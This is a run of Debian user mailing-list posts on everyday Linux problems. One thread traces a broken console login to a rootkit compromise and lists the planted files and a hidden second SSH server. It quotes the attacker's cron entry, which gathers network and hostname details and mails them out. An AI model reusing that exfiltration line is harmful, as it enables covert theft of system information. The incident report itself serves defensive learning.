Re: Making a distribution
On Wed, Dec 10, 2003 at 06:30:26PM -0800, Karsten M. Self wrote: > on Wed, Dec 10, 2003 at 04:29:41PM -, Antony Gelberg ([EMAIL PROTECTED]) wrote: > > Hi all, > > > > One of the things I often do in my line of work is install a Linux bridging > > firewall. I generally install a minimal Debian, recompile the kernel, and > > run my bridge and firewall scripts from bootmisc.sh. > > > > What I'd really like is to create a distribution of my own that would > > install automatically onto a PC, with minimal interactivity. For example, I > > don't want to be asked about partitioning, I just want to wipe the disk, > > create an ext3 partition and format it. I want vim, links, sshd (amongst > > others). I want apt-get and a custom 2.4.23 kernel. > > > > Is there a way to do this based on Debian (for apt-get etc)? I am a big > > Debian fan, but even a minimal install is more than I need. > > FAI. Bootfloppies. Possibly other ideas. > > Or look at Linux From Scratch. One messy way is to make a CD image with mkisofs that boots linux, runs fdisk to format /dev/hda, untars a small customised root partition taken from an existing installation, and runs lilo (using chroot I guess). Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: PDF & cut-&-paste ???
On Tue, Dec 16, 2003 at 01:05:44AM -0600, Michael D Schleif wrote: > Which PDF readers allow blocking and cut-&-paste? > > Also, which allow searching for text and phrases? xpdf allows cut and paste. It feels funny because it is a pixel-wise block, but it works. For searching, it might be enough to use pdftotext | grep I don't know which other ones allow searching. Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: PDF & cut-&-paste ???
On Tue, Dec 16, 2003 at 06:46:16PM +1100, Patrick Lesslie wrote: > On Tue, Dec 16, 2003 at 01:05:44AM -0600, Michael D Schleif wrote: > > Which PDF readers allow blocking and cut-&-paste? > > > > Also, which allow searching for text and phrases? > > xpdf allows cut and paste. It feels funny because it is a > pixel-wise block, but it works. > > For searching, it might be enough to use pdftotext | grep > I don't know which other ones allow searching. Ok, I take that back ... xpdf has a search button. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
console login fails
Hi, I'm having trouble logging into tty1-tty6. I get a prompt, put in my username and hit enter, and then it hangs for 10 seconds without asking for a password, and brings up another login prompt. Has anyone seen this? I'm having trouble finding relevant hits. thx, Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: console login fails
On Fri, Dec 19, 2003 at 02:12:48PM +1100, Patrick Lesslie wrote: > I'm having trouble logging into tty1-tty6. > > I get a prompt, put in my username and hit enter, and then > it hangs for 10 seconds without asking for a password, > and brings up another login prompt. Having done a bit more research, I'm upgrading "util-linux" and the aptly named "login" to sarge (some things were already there ;). However apt-get install login fails like this: ... Unpacking replacement login ... dpkg: error processing /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb (--unpack): unable to make backup link of `./bin/login' before installing new version: Operation not permitted Errors were encountered while processing: /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb E: Sub-process /usr/bin/dpkg returned an error code (1) I'm root, and I'm not sure why this is failing. thanks, Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: console login fails
On Fri, Dec 19, 2003 at 09:29:46AM -0600, Kent West wrote: > > Can you login as a different user? As root? No. (I can login to X, or via ssh though). > Are any of your partitions mounted read-only? /dev/hda10 on / type ext3 (rw,errors=remount-ro) > Have you fsck'd your partitions lately? fsck has been reporting them clean. However e2fsck.ext3 -c /dev/hda10 from Knoppix 3.2 reported that the fs had been modified, but gave little information. I'm sorry I've lost the output, but it didn't look strange to me. It hasn't fixed the problem (but see below). > What are the permissions on './bin/login'? -rw-rw-rw-1 root root0 Oct 9 09:36 /bin/login I think I see the problem here. It's empty. :-} So getty is timing out. However if I try to move this file it gives a permission denied: root:/bin# mv login login-tmp mv: cannot move `login' to `login-tmp': Operation not permitted root:~# chmod 644 /bin/login chmod: changing permissions of `/bin/login': Operation not permitted root:~# rm /bin/login remove write-protected regular empty file `/bin/login'? n I can copy it, and move other files in the same directory. It is presumably this problem that is preventing it's upgrade. I suppose I could try dropping another /bin/login on top of it, or removing it, but I'm quite curious now. However, I don't know enough about filesystems to know what has happened. root:~# stat /bin/login File: `/bin/login' Size: 0 Blocks: 0 IO Block: 4096 Regular File Device: 30ah/778d Inode: 17894 Links: 1 Access: (0666/-rw-rw-rw-) Uid: (0/root) Gid: (0/ root) Access: 2003-10-09 09:36:03.0 +1000 Modify: 2003-10-09 09:36:03.0 +1000 Change: 2003-10-09 09:36:03.0 +1000 Nothing else is playing up, the system seems fine apart from this. Thanks very much for your advice. Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: kazaa
On Sat, Dec 20, 2003 at 10:41:50AM +, Dr Gavin Seddon wrote: > Hello, > Last night I was at a friends house and he showed me Kazaa lite. I > found this morning it is possible to run it on my Debian machine using > wine. Can anyone tell me how to do this, pls? Unless you really want wine and kazaa-lite, you might enjoy the similar functionality of gtk-gnutella. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Suspected system compromise (was: Re: console login fails)
On Mon, Dec 22, 2003 at 04:29:48AM -0800, Karsten M. Self wrote:
> on Fri, Dec 19, 2003 at 05:25:13PM +1100, Patrick Lesslie wrote:
> > On Fri, Dec 19, 2003 at 02:12:48PM +1100, Patrick Lesslie wrote:
> > unable to make backup link of `./bin/login' before installing new version:
> > Operation not permitted
> > Errors were encountered while processing:
> > /var/cache/apt/archives/login_1%3a4.0.3-12_i386.deb
> > E: Sub-process /usr/bin/dpkg returned an error code (1)
> >
> > I'm root, and I'm not sure why this is failing.
>
> I smell a system compromise.
You smell correctly. I discovered it shortly after Kent's post,
when my old woody chkrootkit found suspicious files in
/lib/security/.config/. It turned out to be (a variant of perhaps)
the "adore" rootkit. I don't know how they got in, there weren't
old enough logs, and perhaps some were removed, but let's just
say security wasn't "stellar". It had been compromised for 73 days
before I got around to fixing what I thought was just a bug in the
virtual console login. It was a home gateway, and a desktop with
heaps of packages.
> First try 'lsattr /bin/login'. Check that the partition is mounted
> writable.
# ls -l /old/bin/login
suSiadAc-- /old/bin/login
# ls -l /bin/login
-- /bin/login
> Look at your process table -- 'cd /proc; echo *' or 'cd /proc; ls '
> should show you what's available. Treat with suspicion any process IDs
> which persistantly appear in output of one or the other of those
> actions, but not in 'ps ux' output.
>
> Better: Immediately disconnect your system from network and boot known
> good media: a rescue disk, LNX-BBC, Damn Small Linux, Knoppix,
> tomsrtbt, etc. Compare /bin/login vs. md5sum from
> /var/lib/dpkg/info/login.md5sums.
It was empty, so the sums probably would not match :)
> http://www.wiggy.net/debian/developer-securing/
Thanks for those good tips.
We found some compromised files by modification date:
/bin/login
/lib/libext-2.so.7 ("dbx7If0tG/8ZM")
/etc/ld.so.hash ("dbx7If0tG/8ZM")
/usr/include/hosts.h ("3 4784\n4 4784")
/etc/shadow-
/var/spool/cron/crontabs/operator
/lib/security/.config/ssh/ssh_random_seed
/lib/security/.config/ssh/sshd_config
/lib/security/.config/ssh/ssh_host_key.pub (a key for "[EMAIL PROTECTED]")
/lib/security/.config/sshd
/usr/sbin/xntps
/var/tmp/.../s
/var/tmp/.../apal/samba
/var/tmp/.../apal/scan
The first four files had modified attributes. The last five were
binaries. The kit apparently enables a second ssh server on a high
port like 15000, with public key authentication.
My favourite file was the last one, which contained this cron entry:
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (crontab-entry installed on Thu Oct 9 09:36:03 2003)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
0 0 1 * * /sbin/ifconfig |grep inet >/tmp/.log 2>/dev/null; /bin/hostname -f
>>/tmp/.log 2>/dev/null; /usr/local/games/banner /usr/local/games/tcp.log >>/tmp/.log
2>/dev/null; cat /tmp/.log|mail -s 'tcp.log' [EMAIL PROTECTED] >/dev/null 2>&1; rm -f
/tmp/.log >/dev/null 2>&1
So much for me hoping that our dynamic IP would have helped ;-)
So, I've reinstalled on another partition, and put a gateway in between,
and I've learned some lessons too.
Patrick
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Suspected system compromise (was: Re: console login fails)
On Tue, Dec 23, 2003 at 01:46:56AM +1100, Patrick Lesslie wrote: > My favourite file was the last one ... I mean, the crontab one. > Patrick -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Menu maker
On Mon, Dec 22, 2003 at 06:22:32PM -0600, Damon L. Chesser wrote: > Is Menu maker part of deb? I can't seem to find it. I searched for > menumaker, menu-maker, mmaker, menmaker. Perhaps you mean the "menu" package. Also, wmaker provides "WPrefs", which lets you customise the wmaker menu. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Root Partition Fills Up Completely After a Few Hours
On Thu, Dec 25, 2003 at 09:40:14PM -0800, Scarletdown wrote: > > Leaving the system unattended for a few hours, the / partition on my > hard drive mysteriously fills up. When I open up KDiskfree, the > partition in question shows as 100% used (red line all the way across.) > > This has happened twice now. The first time was after I went to bed > last night. When I got up this morning, the drive was full. Then, it > happened again while we were out doing Christmas dinner and movies. We > left around 11:30 this morning, and when we returned just about a half > hour ago, it was full again. Both times, I was able to clear it by > logging out and back in again. I saw a problem a bit like this once on a potato machine running kde. I can't remember the details, but there was a huge file of zeros in a .kde directory or similar. I found it by doing du -sh * from the top directory and following down through the biggest ones until I found the file. Finding the file will give you some clue as to its origin. Someone might suggest a find command to find all the really large files in one go. > I'm suspecting that the culprit is ipmasq. I noticed that when I'm > logged in to any text console, I occasionally get various firewall > status lines, such as: > > IN= OUT=eth0 SRC=68.113.22.3 DST=68.111.54.95 LEN=40 TOS=0x00 PREC=0x00 > TTL=64 ID=0 DF PROTO=TCP SP > > I'm guessing that this stuff is also going into some sort of temporary > log file, which gets rather full after a few hours. What can I do to > stop this? At the very least, I would like to set things up so ipmasq > either creates no log file, or limits the size of the file to something > reasonable. I'd also like to set it so those messages don't come up on > the screen as well, as it gets rather annoying when I'm working from a > console. On my system they are logged into /var/log/kern.log* I don't think they are likely to be the problem unless you either have a tiny amount of free space or a _really_ busy site. These log files normally amount to just a few megabytes. There are a couple of ways to stop the logging to the console. The only one I know off hand is a bit dirty - that is: # echo "1 4 1 6" > /proc/sys/kernel/printk to adjust the kernel logging levels. You could put it in a startup script or just run it when you feel like it. Have a look at that file to see what it is now. There are much nicer ways though! It would be better for instance to redirect all that stuff to one virtual console. Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: no devices or drivers dir under /proc/bus/usb
On Thu, Jan 22, 2004 at 07:07:00AM -0600, Vale Kenny wrote: > According to linux-usb.org, after I've mounted usbdevfs and > loaded the necessary usb modules, I should have two directories > under /proc/bus/usb, devices and drivers. I have naught. > I completely out of ideas. Here are the logs and various bits > of information I thought would be useful. Can you confirm that it is mounted? You want this in /etc/fstab: none/proc/bus/usb usbdevfs defaults 0 0 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Re: no devices or drivers dir under /proc/bus/usb
On Thu, Jan 22, 2004 at 07:50:43AM -0600, Vale Kenny wrote: > /etc/fst# /etc/fstab: static file system information. > none /proc/bus/usb usbfs defaults0 0 > usbdevfs /proc/bus/usb usbdevfs defaults 0 0 Maybe try without the second line. I only have the first one. Also there's some information in Documentation/usb/proc_usb_info.txt in the kernel source tree that might help. Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: LILO
On Sat, Feb 28, 2004 at 10:10:29PM -0500, MacNean Tyrrell wrote: > my lilo seems to be screwed up, it > boots and I get some OS/2 thing, I even tried reinstalling debian from net, > it ejects the disk and reboots and same thing. What do I do? Do you mean you can't boot from a rescue disk? If you can, you'll be able to work on the MBR. Have a look in your BIOS to make sure it's setup to boot from floppy, or better from CD, and that there isn't anything screwy going on. Also you could send more specific information on what you have tried and exactly what happened when you tried it. > How can I edit LILO or erase the mbr or something so I can start all over? Once you can boot from a rescue disk with root=/dev/hda1 or similar you'll be able to edit lilo and run it. There are other ways too, but first try a rescue floppy or CD until you can boot linux. best of luck, Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: FreeS/WAN patch compatibility with freeswan package?
(A late reply) On Mon, Jan 19, 2004 at 10:41:46AM -0800, Adam Morley wrote: > Hi, > > I have a server where I'd like to be able to use functionality > provided by later versions of the freeswan kernel patch --- namely, > 0.9.14 of the X.509 patches provided support for the > leftprotoport/rightprotoport. > (http://www.strongsec.com/freeswan/install.htm#section_4.5). That's a nice page. > I'd rather not have to build my own versions of the freeswan > package, but use the one already included with Debian Woody. > Is this possible if I'm running a later version of the freeswan > kernel patch (like this one: > http://www.strongsec.com/freeswan/x509patch-0.9.37-freeswan-1.99.tar.gz)? > Or will I have to track both the kernel patch and a later version > of the freeswan tools? > > I thought I could use sarge's freeswan package, but being that > I'm rather new to Debian, I don't know a whole lot about just > upgrading that one package. Suggestions for the best "debian way" > to do something like this would be helpful. I can't answer your first question about whether you need to upgrade freeswan to work with the later kernel patch, but I might say, in order to install something from sarge, just update to sarge, install it and then update to stable and noone will be any the wiser (ducks) You can simulate install with apt-get -s install freeswan If it goes in and you change your mind, you will need to explicitly downgrade, e.g.: apt-get install freeswan= Some people do this, using mixed releases with debian stable, testing, and unstable quite routinely. I think it's a nice thing about Debian that it very often works, because of the dependency checking in .deb files. It is basically deprecated though, I guess because some core things have to be in one distribution or other or they don't work properly, but I don't really know. More thorough is to backport it, or find a woody backport from someone reputable. This avoids recompiling (if possible) the testing or unstable source on your woody system, which is also good of course. Actually, looking now, you may need to recompile it (not difficult). This better answer to the second question, from the archives of this very list: http://lists.debian.org/debian-user/2003/debian-user-200306/msg02995.html Patrick Lesslie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
